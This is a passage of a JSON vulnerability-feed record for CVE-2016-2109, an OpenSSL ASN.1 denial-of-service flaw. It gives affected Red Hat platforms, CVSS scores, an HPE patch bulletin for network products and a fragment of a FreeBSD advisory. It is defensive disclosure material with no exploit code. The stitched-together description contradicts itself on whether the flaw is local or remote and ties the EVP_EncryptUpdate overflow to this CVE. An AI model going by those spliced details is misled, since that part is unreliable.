                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_hpc_node:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_hpc_node_eus:7.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_hpc_node:6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2016-2109"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Brian Carpenter",
    "sources": [
      {
        "db": "BID",
        "id": "87940"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201605-083"
      }
    ],
    "trust": 0.9
  },
  "cve": "CVE-2016-2109",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.8,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 7.8,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2016-2109",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.0"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.5,
            "baseSeverity": "High",
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2016-2109",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2016-2109",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201605-083",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2016-2109",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2016-2109"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-002476"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201605-083"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-2109"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The asn1_d2i_read_bio function in crypto/asn1/a_d2i_fp.c in the ASN.1 BIO implementation in OpenSSL before 1.0.1t and 1.0.2 before 1.0.2h allows remote attackers to cause a denial of service (memory consumption) via a short invalid encoding. OpenSSL is prone to a local denial-of-service vulnerability. \nAn attacker may exploit this issue to crash the application or consume excessive amount of data, resulting in denial-of-service conditions. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03756en_us\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: hpesbhf03756en_us\nVersion: 1\n\nHPESBHF03756 rev.1 -  HPE Network Products including Comware 7, iMC, and VCX\nrunning OpenSSL, Remote Denial of Service (DoS), Disclosure of Sensitive\nInformation\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2017-06-05\nLast Updated: 2017-06-05\n\nPotential Security Impact: Remote: Denial of Service (DoS), Disclosure of\nSensitive Information\n\nSource: Hewlett Packard Enterprise, Product Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities with OpenSSL have been addressed for HPE\nnetwork products including Comware 7, iMC, and VCX. The vulnerabilities could\nbe remotely exploited resulting in Denial of Service (DoS) or disclosure of\nsensitive information. \n\nReferences:\n\n  - CVE-2016-2105 - Remote Denial of Service (DoS)\n  - CVE-2016-2106 - Remote Denial of Service (DoS)\n  - CVE-2016-2107 - Remote disclosure of sensitive information\n  - CVE-2016-2108 - Remote Denial of Service (DoS)\n  - CVE-2016-2109 - Remote Denial of Service (DoS)\n  - CVE-2016-2176 - Remote Denial of Service (DoS)\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n\n  - VCX Products All versions - Please refer to the RESOLUTION below for a\nlist of updated products. \n  - Comware v7 (CW7) Products All versions - Please refer to the RESOLUTION\nbelow for a list of updated products. \n  - HP Intelligent Management Center (iMC) All versions - Please refer to the\nRESOLUTION below for a list of updated products. \n\nBACKGROUND\n\n  CVSS Base Metrics\n  =================\n  Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector\n\n    CVE-2016-2105\n      5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\n      5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n    CVE-2016-2106\n      5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\n      5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n    CVE-2016-2107\n      3.7 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N\n      2.6 (AV:N/AC:H/Au:N/C:P/I:N/A:N)\n\n    CVE-2016-2108\n      9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n      10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n    CVE-2016-2109\n      7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\n      7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C)\n\n    CVE-2016-2176\n      6.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L\n      6.4 (AV:N/AC:L/Au:N/C:P/I:N/A:P)\n\n    Information on CVSS is documented in\n    HPE Customer Notice HPSN-2008-002 here:\n\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499\n\nRESOLUTION\n\nHPE has made the following software updates available to resolve the\nvulnerabilities in the Comware 7, iMC and VCX products running OpenSSL. \n\n**COMWARE 7 Products**\n\n  + 12500 (Comware 7) - Version: R7377P02\n    * HP Network Products\n      - JC072B HP 12500 Main Processing Unit\n      - JC085A HP A12518 Switch Chassis\n      - JC086A HP A12508 Switch Chassis\n      - JC652A HP 12508 DC Switch Chassis\n      - JC653A HP 12518 DC Switch Chassis\n      - JC654A HP 12504 AC Switch Chassis\n      - JC655A HP 12504 DC Switch Chassis\n      - JF430A HP A12518 Switch Chassis\n      - JF430B HP 12518 Switch Chassis\n      - JF430C HP 12518 AC Switch Chassis\n      - JF431A HP A12508 Switch Chassis\n      - JF431B HP 12508 Switch Chassis\n      - JF431C HP 12508 AC Switch Chassis\n      - JG497A HP 12500 MPU w/Comware V7 OS\n      - JG782A HP FF 12508E AC Switch Chassis\n      - JG783A HP FF 12508E DC Switch Chassis\n      - JG784A HP FF 12518E AC Switch Chassis\n      - JG785A HP FF 12518E DC Switch Chassis\n      - JG802A HP FF 12500E MPU\n    * CVEs\n      - CVE-2016-2105\n      - CVE-2016-2106\n      - CVE-2016-2107\n      - CVE-2016-2108\n      - CVE-2016-2109\n      - CVE-2016-2176\n  + 10500 (Comware 7) - Version: R7184\n    * HP Network Products\n      - JC611A HP 10508-V Switch Chassis\n      - JC612A HP 10508 Switch Chassis\n      - JC613A HP 10504 Switch Chassis\n      - JC748A HP 10512 Switch Chassis\n      - JG608A HP FlexFabric 11908-V Switch Chassis\n      - JG609A HP FlexFabric 11900 Main Processing Unit\n      - JG820A HP 10504 TAA Switch Chassis\n      - JG821A HP 10508 TAA Switch Chassis\n      - JG822A HP 10508-V TAA Switch Chassis\n      - JG823A HP 10512 TAA Switch Chassis\n      - JG496A HP 10500 Type A MPU w/Comware v7 OS\n      - JH198A HP 10500 Type D Main Processing Unit with Comware v7 Operating\nSystem\n      - JH206A HP 10500 Type D TAA-compliant with Comware v7 Operating System\nMain Processing Unit\n    * CVEs\n      - CVE-2016-2105\n      - CVE-2016-2106\n      - CVE-2016-2107\n      - CVE-2016-2108\n      - CVE-2016-2109\n      - CVE-2016-2176\n  + 5900/5920 (Comware 7) - Version: R2422P02\n    * HP Network Products\n      - JC772A HP 5900AF-48XG-4QSFP+ Switch\n      - JG296A HP 5920AF-24XG Switch\n      - JG336A HP 5900AF-48XGT-4QSFP+ Switch\n      - JG510A HP 5900AF-48G-4XG-2QSFP+ Switch\n      - JG554A HP 5900AF-48XG-4QSFP+ TAA Switch\n      - JG555A HP 5920AF-24XG TAA Switch\n      - JG838A HP FF 5900CP-48XG-4QSFP+ Switch\n      - JH036A HP FlexFabric 5900CP 48XG 4QSFP+ TAA-Compliant\n      - JH037A HP 5900AF 48XGT 4QSFP+ TAA-Compliant Switch\n      - JH038A HP 5900AF 48G 4XG 2QSFP+ TAA-Compliant\n    * CVEs\n      - CVE-2016-2105\n      - CVE-2016-2106\n      - CVE-2016-2107\n      - CVE-2016-2108\n      - CVE-2016-2109\n      - CVE-2016-2176\n  + MSR1000 (Comware 7) - Version: R0306P52\n    * HP Network Products\n      - JG875A HP MSR1002-4 AC Router\n      - JH060A HP MSR1003-8S AC Router\n    * CVEs\n      - CVE-2016-2105\n      - CVE-2016-2106\n      - CVE-2016-2107\n      - CVE-2016-2108\n      - CVE-2016-2109\n      - CVE-2016-2176\n  + MSR2000 (Comware 7) - Version: R0306P52\n    * HP Network Products\n      - JG411A HP MSR2003 AC Router\n      - JG734A HP MSR2004-24 AC Router\n      - JG735A HP MSR2004-48 Router\n      - JG866A HP MSR2003 TAA-compliant AC Router\n    * CVEs\n      - CVE-2016-2105\n      - CVE-2016-2106\n      - CVE-2016-2107\n      - CVE-2016-2108\n      - CVE-2016-2109\n      - CVE-2016-2176\n  + MSR3000 (Comware 7) - Version: R0306P52\n    * HP Network Products\n      - JG404A HP MSR3064 Router\n      - JG405A HP MSR3044 Router\n      - JG406A HP MSR3024 AC Router\n      - JG407A HP MSR3024 DC Router\n      - JG408A HP MSR3024 PoE Router\n      - JG409A HP MSR3012 AC Router\n      - JG410A HP MSR3012 DC Router\n      - JG861A HP MSR3024 TAA-compliant AC Router\n    * CVEs\n      - CVE-2016-2105\n      - CVE-2016-2106\n      - CVE-2016-2107\n      - CVE-2016-2108\n      - CVE-2016-2109\n      - CVE-2016-2176\n  + MSR4000 (Comware 7) - Version: R0306P52\n    * HP Network Products\n      - JG402A HP MSR4080 Router Chassis\n      - JG403A HP MSR4060 Router Chassis\n      - JG412A HP MSR4000 MPU-100 Main Processing Unit\n      - JG869A HP MSR4000 TAA-compliant MPU-100 Main Processing Unit\n    * CVEs\n      - CVE-2016-2105\n      - CVE-2016-2106\n      - CVE-2016-2107\n      - CVE-2016-2108\n      - CVE-2016-2109\n      - CVE-2016-2176\n  + VSR (Comware 7) - Version: E0324\n    * HP Network Products\n      - JG810AAE HP VSR1001 Virtual Services Router 60 Day Evaluation\nSoftware\n      - JG811AAE HP VSR1001 Comware 7 Virtual Services Router\n      - JG812AAE HP VSR1004 Comware 7 Virtual Services Router\n      - JG813AAE HP VSR1008 Comware 7 Virtual Services Router\n    * CVEs\n      - CVE-2016-2105\n      - CVE-2016-2106\n      - CVE-2016-2107\n      - CVE-2016-2108\n      - CVE-2016-2109\n      - CVE-2016-2176\n  + 7900 (Comware 7) - Version: R2152\n    * HP Network Products\n      - JG682A HP FlexFabric 7904 Switch Chassis\n      - JG841A HP FlexFabric 7910 Switch Chassis\n      - JG842A HP FlexFabric 7910 7.2Tbps Fabric / Main Processing Unit\n      - JH001A HP FlexFabric 7910 2.4Tbps Fabric / Main Processing Unit\n      - JH122A HP FlexFabric 7904 TAA-compliant Switch Chassis\n      - JH123A HP FlexFabric 7910 TAA-compliant Switch Chassis\n      - JH124A HP FlexFabric 7910 7.2Tbps TAA-compliant Fabric/Main\nProcessing Unit\n      - JH125A HP FlexFabric 7910 2.4Tbps TAA-compliant Fabric/Main\nProcessing Unit\n    * CVEs\n      - CVE-2016-2105\n      - CVE-2016-2106\n      - CVE-2016-2107\n      - CVE-2016-2108\n      - CVE-2016-2109\n      - CVE-2016-2176\n  + 5130 (Comware 7) - Version: R3115\n    * HP Network Products\n      - JG932A HP 5130-24G-4SFP+ EI Switch\n      - JG933A HP 5130-24G-SFP-4SFP+ EI Switch\n      - JG934A HP 5130-48G-4SFP+ EI Switch\n      - JG936A HP 5130-24G-PoE+-4SFP+ (370W) EI Switch\n      - JG937A HP 5130-48G-PoE+-4SFP+ (370W) EI Switch\n      - JG938A HP 5130-24G-2SFP+-2XGT EI Switch\n      - JG939A HP 5130-48G-2SFP+-2XGT EI Switch\n      - JG940A HP 5130-24G-PoE+-2SFP+-2XGT (370W) EI Switch\n      - JG941A HP 5130-48G-PoE+-2SFP+-2XGT (370W) EI Switch\n      - JG975A HP 5130-24G-4SFP+ EI Brazil Switch\n      - JG976A HP 5130-48G-4SFP+ EI Brazil Switch\n      - JG977A HP 5130-24G-PoE+-4SFP+ (370W) EI Brazil Switch\n      - JG978A HP 5130-48G-PoE+-4SFP+ (370W) EI Brazil Switch\n    * CVEs\n      - CVE-2016-2105\n      - CVE-2016-2106\n      - CVE-2016-2107\n      - CVE-2016-2108\n      - CVE-2016-2109\n      - CVE-2016-2176\n  + 6125XLG - Version: R2422P02\n    * HP Network Products\n      - 711307-B21 HP 6125XLG Blade Switch\n      - 737230-B21 HP 6125XLG Blade Switch with TAA\n    * CVEs\n      - CVE-2016-2105\n      - CVE-2016-2106\n      - CVE-2016-2107\n      - CVE-2016-2108\n      - CVE-2016-2109\n      - CVE-2016-2176\n  + 6127XLG - Version: R2422P02\n    * HP Network Products\n      - 787635-B21 HP 6127XLG Blade Switch Opt Kit\n      - 787635-B22 HP 6127XLG Blade Switch with TAA\n    * CVEs\n      - CVE-2016-2105\n      - CVE-2016-2106\n      - CVE-2016-2107\n      - CVE-2016-2108\n      - CVE-2016-2109\n      - CVE-2016-2176\n  + Moonshot - Version: R2432\n    * HP Network Products\n      - 786617-B21 - HP Moonshot-45Gc Switch Module\n      - 704654-B21 - HP Moonshot-45XGc Switch Module\n      - 786619-B21 - HP Moonshot-180XGc Switch Module\n    * CVEs\n      - CVE-2016-2105\n      - CVE-2016-2106\n      - CVE-2016-2107\n      - CVE-2016-2108\n      - CVE-2016-2109\n      - CVE-2016-2176\n  + 5700 (Comware 7) - Version: R2422P02\n    * HP Network Products\n      - JG894A HP FlexFabric 5700-48G-4XG-2QSFP+ Switch\n      - JG895A HP FlexFabric 5700-48G-4XG-2QSFP+ TAA-compliant Switch\n      - JG896A HP FlexFabric 5700-40XG-2QSFP+ Switch\n      - JG897A HP FlexFabric 5700-40XG-2QSFP+ TAA-compliant Switch\n      - JG898A HP FlexFabric 5700-32XGT-8XG-2QSFP+ Switch\n      - JG899A HP FlexFabric 5700-32XGT-8XG-2QSFP+ TAA-compliant Switch\n    * CVEs\n      - CVE-2016-2105\n      - CVE-2016-2106\n      - CVE-2016-2107\n      - CVE-2016-2108\n      - CVE-2016-2109\n      - CVE-2016-2176\n  + 5930 (Comware 7) - Version: R2422P02\n    * HP Network Products\n      - JG726A HP FlexFabric 5930 32QSFP+ Switch\n      - JG727A HP FlexFabric 5930 32QSFP+ TAA-compliant Switch\n      - JH178A HP FlexFabric 5930 2QSFP+ 2-slot Switch\n      - JH179A HP FlexFabric 5930 4-slot Switch\n      - JH187A HP FlexFabric 5930 2QSFP+ 2-slot TAA-compliant Switch\n      - JH188A HP FlexFabric 5930 4-slot TAA-compliant Switch\n    * CVEs\n      - CVE-2016-2105\n      - CVE-2016-2106\n      - CVE-2016-2107\n      - CVE-2016-2108\n      - CVE-2016-2109\n      - CVE-2016-2176\n  + 1950 (Comware 7) - Version: R3115\n    * HP Network Products\n      - JG960A HP 1950-24G-4XG Switch\n      - JG961A HP 1950-48G-2SFP+-2XGT Switch\n      - JG962A HP 1950-24G-2SFP+-2XGT-PoE+(370W) Switch\n      - JG963A HP 1950-48G-2SFP+-2XGT-PoE+(370W) Switch\n    * CVEs\n      - CVE-2016-2105\n      - CVE-2016-2106\n      - CVE-2016-2107\n      - CVE-2016-2108\n      - CVE-2016-2109\n      - CVE-2016-2176\n  + 7500 (Comware 7) - Version: R7184\n    * HP Network Products\n      - JD238C HP 7510 Switch Chassis\n      - JD239C HP 7506 Switch Chassis\n      - JD240C HP 7503 Switch Chassis\n      - JD242C HP 7502 Switch Chassis\n      - JH207A HP 7500 1.2Tbps Fabric with 2-port 40GbE QSFP+ for IRF-Only\nMain Processing Unit\n      - JH208A HP 7502 Main Processing Unit\n      - JH209A HP 7500 2.4Tbps Fabric with 8-port 1/10GbE SFP+ and 2-port\n40GbE QSFP+ Main Processing Unit\n    * CVEs\n      - CVE-2016-2105\n      - CVE-2016-2106\n      - CVE-2016-2107\n      - CVE-2016-2108\n      - CVE-2016-2109\n      - CVE-2016-2176\n  + 5510HI (Comware 7) - Version: R1120P10\n    * HP Network Products\n      - JH145A HPE 5510 24G 4SFP+ HI 1-slot Switch\n      - JH146A HPE 5510 48G 4SFP+ HI 1-slot Switch\n      - JH147A HPE 5510 24G PoE+ 4SFP+ HI 1-slot Switch\n      - JH148A HPE 5510 48G PoE+ 4SFP+ HI 1-slot Switch\n      - JH149A HPE 5510 24G SFP 4SFP+ HI 1-slot Switch\n    * CVEs\n      - CVE-2016-2105\n      - CVE-2016-2106\n      - CVE-2016-2107\n      - CVE-2016-2108\n      - CVE-2016-2109\n      - CVE-2016-2176\n  + 5130HI (Comware 7) - Version: R1120P10\n    * HP Network Products\n      - JH323A HPE 5130 24G 4SFP+ 1-slot HI Switch\n      - JH324A HPE 5130 48G 4SFP+ 1-slot HI Switch\n      - JH325A HPE 5130 24G PoE+ 4SFP+ 1-slot HI Switch\n      - JH326A HPE 5130 48G PoE+ 4SFP+ 1-slot HI Switch\n    * CVEs\n      - CVE-2016-2105\n      - CVE-2016-2106\n      - CVE-2016-2107\n      - CVE-2016-2108\n      - CVE-2016-2109\n      - CVE-2016-2176\n  + 5940 - Version: R2509\n    * HP Network Products\n      - JH390A HPE FlexFabric 5940 48SFP+ 6QSFP28 Switch\n      - JH391A HPE FlexFabric 5940 48XGT 6QSFP28 Switch\n      - JH394A HPE FlexFabric 5940 48XGT 6QSFP+ Switch\n      - JH395A HPE FlexFabric 5940 48SFP+ 6QSFP+ Switch\n      - JH396A HPE FlexFabric 5940 32QSFP+ Switch\n      - JH397A HPE FlexFabric 5940 2-slot Switch\n      - JH398A HPE FlexFabric 5940 4-slot Switch\n    * CVEs\n      - CVE-2016-2105\n      - CVE-2016-2106\n      - CVE-2016-2107\n      - CVE-2016-2108\n      - CVE-2016-2109\n      - CVE-2016-2176\n  + 5950 - Version: R6123\n    * HP Network Products\n      - JH321A HPE FlexFabric 5950 32QSFP28 Switch\n      - JH402A HPE FlexFabric 5950 48SFP28 8QSFP28 Switch\n      - JH404A HPE FlexFabric 5950 4-slot Switch\n  + 12900E (Comware 7) - Version: R2609\n    * HP Network Products\n      - JG619A HP FlexFabric 12910 Switch AC Chassis\n      - JG621A HP FlexFabric 12910 Main Processing Unit\n      - JG632A HP FlexFabric 12916 Switch AC Chassis\n      - JG634A HP FlexFabric 12916 Main Processing Unit\n      - JH104A HP FlexFabric 12900E Main Processing Unit\n      - JH114A HP FlexFabric 12910 TAA-compliant Main Processing Unit\n      - JH263A HP FlexFabric 12904E Main Processing Unit\n      - JH255A HP FlexFabric 12908E Switch Chassis\n      - JH262A HP FlexFabric 12904E Switch Chassis\n      - JH113A HP FlexFabric 12910 TAA-compliant Switch AC Chassis\n      - JH103A HP FlexFabric 12916E Switch Chassis\n    * CVEs\n      - CVE-2016-2105\n      - CVE-2016-2106\n      - CVE-2016-2107\n      - CVE-2016-2108\n      - CVE-2016-2109\n      - CVE-2016-2176\n\n\n**iMC Products**\n\n  + iNode PC 7.2 (E0410) - Version: 7.2 E0410\n    * HP Network Products\n      - JD144A HP A-IMC User Access Management Software Module with 200-user\nLicense\n      - JD147A HP IMC Endpoint Admission Defense Software Module with\n200-user License\n      - JD435A HP A-IMC Endpoint Admission Defense Client Software\n      - JF388A HP IMC User Authentication Management Software Module with\n200-user License\n      - JF388AAE HP IMC User Authentication Management Software Module with\n200-user E-LTU\n      - JF391A HP IMC Endpoint Admission Defense Software Module with\n200-user License\n      - JF391AAE HP IMC Endpoint Admission Defense Software Module with\n200-user E-LTU\n      - JG752AAE HP IMC User Access Manager Software Module with 50-user\nE-LTU\n      - JG754AAE) HP IMC Endpoint Admission Defense Software Module with\n50-user E-LTU\n    * CVEs\n      - CVE-2016-2106\n      - CVE-2016-2109\n      - CVE-2016-2176\n  + iMC UAM_TAM 7.2-E0409 - Version: 7.2 E0409\n    * HP Network Products\n      - JF388A HP IMC UAM S/W MODULE W/200-USER LICENSE\n      - JF388AAE HP IMC UAM S/W MODULE W/200-USER E-LTU\n      - JG752AAE HP IMC UAM SW MOD W/ 50-USER E-LTU\n      - JG483A HP IMC TAM S/W MODULE W/100-NODE LIC\n      - JG483AAE HP IMC TAM S/W MODULE W/100-NODE E-LTU\n      - JG764AAE HP IMC TAM SW MOD W/ 50-NODE E-LTU\n    * CVEs\n      - CVE-2016-2106\n      - CVE-2016-2109\n      - CVE-2016-2176\n\n\n**VCX Products**\n\n  + VCX - Version: 9.8.19\n    * HP Network Products\n      - J9672A HP VCX V7205 Platform w/ DL360 G7 Srvr\n      - J9668A HP VCX IPC V7005 Pltfrm w/ DL120 G6 Srvr\n      - JC517A HP VCX V7205 Platform w/DL 360 G6 Server\n      -  JE355A HP VCX V6000 Branch Platform 9.0\n      - JC516A HP VCX V7005 Platform w/DL 120 G6 Server\n      - JC518A HP VCX Connect 200 Primry 120 G6 Server\n      - J9669A HP VCX IPC V7310 Pltfrm w/ DL360 G7 Srvr\n      - JE341A HP VCX Connect 100 Secondary\n      - JE252A HP VCX Connect Primary MIM Module\n      - JE253A HP VCX Connect Secondary MIM Module\n      - JE254A HP VCX Branch MIM Module\n      - JE355A HP VCX V6000 Branch Platform 9.0\n      - JD028A HP MS30-40 RTR w/VCX + T1/FXO/FXS/Mod\n      - JD023A HP MSR30-40 Router with VCX MIM Module\n      - JD024A HP MSR30-16 RTR w/VCX Ent Br Com MIM\n      - JD025A HP MSR30-16 RTR w/VCX + 4FXO/2FXS Mod\n      - JD026A HP MSR30-16 RTR w/VCX + 8FXO/4FXS Mod\n      - JD027A HP MSR30-16 RTR w/VCX + 8BRI/4FXS Mod\n      - JD029A HP MSR30-16 RTR w/VCX + E1/4BRI/4FXS\n      - JE340A HP VCX Connect 100 Pri Server 9.0\n      - JE342A HP VCX Connect 100 Sec Server 9.0\n    * CVEs\n      - CVE-2016-2105\n      - CVE-2016-2106\n      - CVE-2016-2108\n      - CVE-2016-2109\n      - CVE-2016-2176\n\n**Note:** Please contact HPE Technical Support if any assistance is needed\nacquiring the software updates. \n\nHISTORY\nVersion:1 (rev.1) - 2 June 2017 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running Hewlett Packard Enterprise (HPE) software\nproducts should be applied in accordance with the customer\u0027s patch management\npolicy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HPE Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hpe.com. \n\nReport: To report a potential security vulnerability for any HPE supported\nproduct:\n  Web form: https://www.hpe.com/info/report-security-vulnerability\n  Email: security-alert@hpe.com\n\nSubscribe: To initiate a subscription to receive future HPE Security Bulletin\nalerts via Email: http://www.hpe.com/support/Subscriber_Choice\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here: http://www.hpe.com/support/Security_Bulletin_Archive\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HPE General Software\nHF = HPE Hardware and Firmware\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPV = ProCurve\nST = Storage Software\nUX = HP-UX\n\nCopyright 2016 Hewlett Packard Enterprise\n\nHewlett Packard Enterprise shall not be liable for technical or editorial\nerrors or omissions contained herein. The information provided is provided\n\"as is\" without warranty of any kind. To the extent permitted by law, neither\nHP or its affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. Hewlett\nPackard Enterprise and the names of Hewlett Packard Enterprise products\nreferenced herein are trademarks of Hewlett Packard Enterprise in the United\nStates and other countries. Other product and company names mentioned herein\nmay be trademarks of their respective owners. \nCorrected:      2016-05-03 18:54:20 UTC (stable/10, 10.3-STABLE)\n                2016-05-04 15:25:47 UTC (releng/10.3, 10.3-RELEASE-p2)\n                2016-05-04 15:26:23 UTC (releng/10.2, 10.2-RELEASE-p16)\n                2016-05-04 15:27:09 UTC (releng/10.1, 10.1-RELEASE-p33)\n                2016-05-04 06:53:02 UTC (stable/9, 9.3-STABLE)\n                2016-05-04 15:27:09 UTC (releng/9.3, 9.3-RELEASE-p41)\nCVE Name:       CVE-2016-2105, CVE-2016-2106, CVE-2016-2107, CVE-2016-2109,\n                CVE-2016-2176\n\nFor general information regarding FreeBSD Security Advisories,\nincluding descriptions of the fields above, security branches, and the\nfollowing sections, please visit \u003cURL:https://security.FreeBSD.org/\u003e.   Background\n\nFreeBSD includes software from the OpenSSL Project. \n\nII.  Problem Description\n\nThe padding check in AES-NI CBC MAC was rewritten to be in constant time\nby making sure that always the same bytes are read and compared against\neither the MAC or padding bytes. But it no longer checked that there was\nenough data to have both the MAC and padding bytes. [CVE-2016-2107]\n\nAn overflow can occur in the EVP_EncodeUpdate() function which is used for\nBase64 encoding of binary data. [CVE-2016-2105]\n\nAn overflow can occur in the EVP_EncryptUpdate() function, however it is\nbelieved that there can be no overflows in internal code due to this problem. \n[CVE-2016-2109]\n\nASN1 Strings that are over 1024 bytes can cause an overread in applications\nusing the X509_NAME_oneline() function on EBCDIC systems. [CVE-2016-2176]\nFreeBSD does not run on any EBCDIC systems and therefore is not affected. \n\nIII. [CVE-2016-2109]  TLS applications are not affected. \n\nIV.  Workaround\n\nNo workaround is available. \n\nV.   Solution\n\nPerform one of the following:\n\n1) Upgrade your vulnerable system to a supported FreeBSD stable or\nrelease / security branch (releng) dated 